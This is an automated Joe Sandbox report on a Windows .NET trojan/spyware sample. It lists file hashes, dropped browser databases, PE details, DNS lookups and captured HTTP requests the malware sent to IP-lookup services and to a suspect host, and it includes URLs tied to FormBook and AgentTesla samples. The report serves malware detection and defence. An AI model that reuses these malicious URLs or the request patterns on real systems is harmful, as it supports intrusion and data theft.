https://secure.comodo.com/CPS0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://whatismyipaddressnow.co | wssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | URL Reputation: safe | unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceidLR | wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/search?q=te | wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://whatismyipaddressnow.co | wssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | whatismyipaddressnow.co | European Union | 13335 | CLOUDFLARENETUS | false
104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1461765
Start date and time: 2024-06-24 16:49:54 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wssvZm9dNK.exe (renamed because the original name is a hash value)
Original Sample Name: 2c5697f085b66bec06e28ed6d24ec606.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/9@6/4
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: wssvZm9dNK.exe
Time | Type | Description
10:50:45 | API Interceptor | 284x Sleep call for process: wssvZm9dNK.exe modified
10:50:55 | API Interceptor | 7x Sleep call for process: netsh.exe modified
10:50:56 | API Interceptor | 215x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | RobloxCheats.exe | malicious | Unknown | ip-api.com/xml/?fields=countryCode,query
208.95.112.1 | Applikationsprograms.exe | malicious | GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | doc20240624-00073.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | FC4311009.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | #U21162.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | TBN88-19062024=Devrez -Bunker Supply Tende.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | #U00d6deme onaylama.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | Purchase List VIXEN International 90349000 PDF.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
188.114.97.3 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/khvbX8Pe/download
188.114.97.3 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/khvbX8Pe/download
188.114.97.3 | NGL 3200-Phase 2- Strainer.exe | malicious | FormBook | www.ad14.fun/az6h/
188.114.97.3 | IMG_05831_0172.exe | malicious | Azorult, PureLog Stealer | hqt3.shop/PL341/index.php
188.114.97.3 | http://awqffg.newburuan2023.biz.id/next.php | malicious | HTMLPhisher | awqffg.newburuan2023.biz.id/img/popup-close.png
188.114.97.3 | Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | malicious | FormBook | www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu
188.114.97.3 | QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/wKVSmV0M/download
188.114.97.3 | DHL ARRIVAL DOCUMENTS.pdf.exe | malicious | FormBook | www.laske.xyz/rn94/?CP60e=Nj5TAPxx-d38Ipw0&SXm49b=ecVnvP4+gKLbyWzZxUSek1PIlioHla43BZzK8t+AR3JOod0Ogp7sAbtZt/g//Mg/fp7+iIhrSw==
188.114.97.3 | M.R NO. 1212-00-RE-REQ-649-01.scr.exe | malicious | FormBook | www.ad14.fun/az6h/?8DVHhn=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbO2WZcnCxPHeYc29EQ8CAdyBkxSGvBbrKIN7laUw7cXNgVnDuYHw=&DNnlG=PlN8o25pW6
188.114.97.3 | Salary List.exe | malicious | FormBook | www.coinwab.com/efdt/
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    No context
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:Berkeley DB 1.85 (Hash, version 2, native byte-order)
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):1.121508608738599
                    Encrypted:false
                    SSDEEP:3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
                    MD5:1DEFC9C4F8AFC884D5714DE065F88E3D
                    SHA1:AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
                    SHA-256:6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
                    SHA-512:B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.7798653713156546
                    Encrypted:false
                    SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                    MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                    SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                    SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                    SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.07093764277882578
                    Encrypted:false
                    SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                    MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                    SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                    SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                    SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                    Category:dropped
                    Size (bytes):122880
                    Entropy (8bit):1.4530338001328815
                    Encrypted:false
                    SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                    MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                    SHA1:BCF6B1893581F2420564160F784E47E91946269A
                    SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                    SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):1146880
                    Entropy (8bit):0.15644146423012004
                    Encrypted:false
                    SSDEEP:192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
                    MD5:E28514A583D6F83F8C67CA62CB891CA7
                    SHA1:4107934697F0891B26B16A6E0D9795271353355C
                    SHA-256:B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
                    SHA-512:BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
                    Malicious:false
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):1.3870145383915669
                    Encrypted:false
                    SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                    MD5:1623709C6B2FB813984B1265C26A85F1
                    SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                    SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                    SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                    Malicious:false
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                    Category:dropped
                    Size (bytes):122880
                    Entropy (8bit):1.4530338001328815
                    Encrypted:false
                    SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                    MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                    SHA1:BCF6B1893581F2420564160F784E47E91946269A
                    SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                    SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                    Malicious:false
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                    Category:dropped
                    Size (bytes):77824
                    Entropy (8bit):1.133993246026424
                    Encrypted:false
                    SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                    MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                    SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                    SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                    SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                    Malicious:false
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.393437263205704
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:wssvZm9dNK.exe
                    File size:57'856 bytes
                    MD5:2c5697f085b66bec06e28ed6d24ec606
                    SHA1:a3910a0f75b328f996983847cfdcc5df85520e98
                    SHA256:432dc35a995a5ba33b1f3887b3cc7804fcc3d5d2b1d4aec2664acaf20cb11bad
                    SHA512:6a2782f95d13973aefa99ee9503ff4c5d814ce74b20755a60dd39f25dfc5e01af5266c08e2c28eb53c0d6d4912493e3e1c02ca9d2fda3cdf3711e71a9bc0d0c9
                    SSDEEP:1536:BxBJBt804BeNBNBRdOemd4HmGECaS3JFF:BxBJBS04BeNBNBRdK2GJsF
                    TLSH:C043522DED50EA96C914F977C8F6F100C37570C76223872E6966ACBA2197727468E0FC
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............."...0.................. ........@.. .......................@............@................................
                    Icon Hash:aaf3e3e3918382a0
                    Entrypoint:0x40f5b2
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x83FE105A [Sun Mar 4 09:20:26 2040 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00402000h]
                     Name | Virtual Address | Virtual Size | Is in Section
                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf568 | 0x4a | .text
                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x6be | .rsrc
                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12000 | 0xc | .reloc
                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                     .text | 0x2000 | 0xd5b8 | 0xd600 | e4552483185499814aa846ea5cf84428 | False | 0.3599591121495327 | OpenPGP Public Key | 5.474091517006805 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                     .rsrc | 0x10000 | 0x6be | 0x800 | 04c8a61356da92d3f8a2a4a962886a13 | False | 0.373046875 | data | 3.713192232392757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                     .reloc | 0x12000 | 0xc | 0x200 | 74cf21c98df36c56482e6954ead78eee | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                     RT_VERSION | 0x100a0 | 0x434 | data | | | 0.43215613382899626
                     RT_MANIFEST | 0x104d4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                     DLL | Import
                     mscoree.dll | _CorExeMain
                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                     Jun 24, 2024 16:50:49.340115070 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:50:49.355318069 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                     Jun 24, 2024 16:50:55.421560049 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:50:55.431735039 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                     Jun 24, 2024 16:50:57.039324045 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:50:57.046508074 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
                     Jun 24, 2024 16:51:02.159045935 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:51:02.170931101 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
                     Jun 24, 2024 16:51:08.142549992 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:51:08.160586119 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
                     Jun 24, 2024 16:51:08.161233902 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
                     Jun 24, 2024 16:51:08.174427986 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                     Jun 24, 2024 16:50:49.340115070 CEST | 192.168.2.22 | 8.8.8.8 | 0xd6cd | Standard query (0) | whatismyipaddressnow.co | A (IP address) | IN (0x0001) | false
                     Jun 24, 2024 16:50:55.421560049 CEST | 192.168.2.22 | 8.8.8.8 | 0xc702 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
                     Jun 24, 2024 16:50:57.039324045 CEST | 192.168.2.22 | 8.8.8.8 | 0x432c | Standard query (0) | 90.168.9.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                     Jun 24, 2024 16:51:02.159045935 CEST | 192.168.2.22 | 8.8.8.8 | 0xfe5 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                     Jun 24, 2024 16:51:08.142549992 CEST | 192.168.2.22 | 8.8.8.8 | 0x3d23 | Standard query (0) | whatismyipaddressnow.co | A (IP address) | IN (0x0001) | false
                     Jun 24, 2024 16:51:08.161233902 CEST | 192.168.2.22 | 8.8.8.8 | 0x3d23 | Standard query (0) | whatismyipaddressnow.co | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jun 24, 2024 16:50:49.355318069 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6cd | No error (0) | whatismyipaddressnow.co | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:50:49.355318069 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6cd | No error (0) | whatismyipaddressnow.co | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:50:55.431735039 CEST | 8.8.8.8 | 192.168.2.22 | 0xc702 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:50:55.431735039 CEST | 8.8.8.8 | 192.168.2.22 | 0xc702 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:50:57.046508074 CEST | 8.8.8.8 | 192.168.2.22 | 0x432c | Name error (3) | 90.168.9.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                    Jun 24, 2024 16:51:02.170931101 CEST | 8.8.8.8 | 192.168.2.22 | 0xfe5 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:51:08.160586119 CEST | 8.8.8.8 | 192.168.2.22 | 0x3d23 | No error (0) | whatismyipaddressnow.co | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:51:08.160586119 CEST | 8.8.8.8 | 192.168.2.22 | 0x3d23 | No error (0) | whatismyipaddressnow.co | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:51:08.174427986 CEST | 8.8.8.8 | 192.168.2.22 | 0x3d23 | No error (0) | whatismyipaddressnow.co | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                    Jun 24, 2024 16:51:08.174427986 CEST | 8.8.8.8 | 192.168.2.22 | 0x3d23 | No error (0) | whatismyipaddressnow.co | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                    • whatismyipaddressnow.co
                    • icanhazip.com
                    • ip-api.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.22 | 49165 | 104.16.185.241 | 80 | 2036 | C:\Users\user\Desktop\wssvZm9dNK.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jun 24, 2024 16:50:55.444897890 CEST | 63 | OUT | GET / HTTP/1.1
                    Host: icanhazip.com
                    Connection: Keep-Alive
                    Jun 24, 2024 16:50:55.915349960 CEST | 534 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:55 GMT
                    Content-Type: text/plain
                    Content-Length: 12
                    Connection: keep-alive
                    Access-Control-Allow-Origin: *
                    Access-Control-Allow-Methods: GET
                    Set-Cookie: __cf_bm=0pjTA9jo2oJu5FKqOaC1UrdAJm5NUcuJzRzPYHTBRtc-1719240655-1.0.1.1-UaWVCoRGi_keMvqB3T5RphK12G6kvXTXqRtG87uXTw1CARwmvoBCHqe9hxh0t4FbZdDEGoEXds8.pVuvqxtzOg; path=/; expires=Mon, 24-Jun-24 15:20:55 GMT; domain=.icanhazip.com; HttpOnly
                    Server: cloudflare
                    CF-RAY: 898d887329a18c57-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                    Data Ascii: 8.46.123.33
                    Jun 24, 2024 16:50:56.124316931 CEST | 534 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:55 GMT
                    Content-Type: text/plain
                    Content-Length: 12
                    Connection: keep-alive
                    Access-Control-Allow-Origin: *
                    Access-Control-Allow-Methods: GET
                    Set-Cookie: __cf_bm=0pjTA9jo2oJu5FKqOaC1UrdAJm5NUcuJzRzPYHTBRtc-1719240655-1.0.1.1-UaWVCoRGi_keMvqB3T5RphK12G6kvXTXqRtG87uXTw1CARwmvoBCHqe9hxh0t4FbZdDEGoEXds8.pVuvqxtzOg; path=/; expires=Mon, 24-Jun-24 15:20:55 GMT; domain=.icanhazip.com; HttpOnly
                    Server: cloudflare
                    CF-RAY: 898d887329a18c57-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                    Data Ascii: 8.46.123.33


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.22 | 49166 | 208.95.112.1 | 80 | 2036 | C:\Users\user\Desktop\wssvZm9dNK.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jun 24, 2024 16:51:02.177234888 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                    Host: ip-api.com
                    Connection: Keep-Alive
                    Jun 24, 2024 16:51:02.649985075 CEST | 175 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 6
                    Access-Control-Allow-Origin: *
                    X-Ttl: 60
                    X-Rl: 44
                    Data Raw: 66 61 6c 73 65 0a
                    Data Ascii: false
                    Jun 24, 2024 16:51:02.864099026 CEST | 175 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:51:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 6
                    Access-Control-Allow-Origin: *
                    X-Ttl: 60
                    X-Rl: 44
                    Data Raw: 66 61 6c 73 65 0a
                    Data Ascii: false


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.22 | 49164 | 188.114.96.3 | 443 | 2036 | C:\Users\user\Desktop\wssvZm9dNK.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-06-24 14:50:49 UTC | 125 | OUT | GET /API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf HTTP/1.1
                    Host: whatismyipaddressnow.co
                    Connection: Keep-Alive
                    2024-06-24 14:50:50 UTC | 619 | IN | HTTP/1.1 200 OK
                    Date: Mon, 24 Jun 2024 14:50:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp%2B0JwZXVODrdxN3Jdf%2Bia0NCvS6uciCbEPzaZkn%2BAzwZ8M5LmS43N1LIQT%2F5n8wEBY%2BxYYCf4ziwuWKaGsKLsXXUFaFN6ukiVO5plqj3XZ1wJhbnCj00Qn6h9Lw6d1u81eDKc%2B%2F0ZtSMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 898d884e9b5fc3ff-EWR
                    alt-svc: h3=":443"; ma=86400
